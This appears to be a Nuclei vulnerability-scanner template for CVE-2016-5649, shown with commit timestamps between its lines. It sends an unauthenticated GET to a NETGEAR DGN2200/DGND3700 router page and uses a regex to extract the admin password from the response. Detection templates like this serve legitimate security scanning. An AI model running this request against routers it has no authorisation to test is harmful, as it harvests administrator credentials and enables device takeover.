2021-07-06 16:04:28 +00:00
id : CVE-2016-5649
2021-07-06 14:25:39 +00:00
info :
2021-08-29 06:39:06 +00:00
name : NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure
2021-07-06 14:25:39 +00:00
author : suman_kar
severity : critical
2021-09-05 21:13:45 +00:00
description : A vulnerability exists within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface.
2021-07-06 16:04:28 +00:00
tags : cve,cve2016,iot,netgear,router
reference : https://nvd.nist.gov/vuln/detail/CVE-2016-5649
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.80
cve-id : CVE-2016-5649
cwe-id : CWE-200
2021-07-06 14:25:39 +00:00
requests :
- raw :
- |
GET /BSW_cxttongr.htm HTTP/1.1
2021-07-06 16:04:28 +00:00
Host : {{Hostname}}
2021-07-06 14:25:39 +00:00
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
2021-07-06 16:04:28 +00:00
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
words :
- "<title>Smart Wizard Result</title> "
part : body
2021-07-06 14:25:39 +00:00
extractors :
- type : regex
name : password
part : body
2021-07-06 16:04:28 +00:00
group : 1
2021-07-06 14:25:39 +00:00
regex :
2021-09-05 21:13:45 +00:00
- '<b>Success "([a-z]+)"'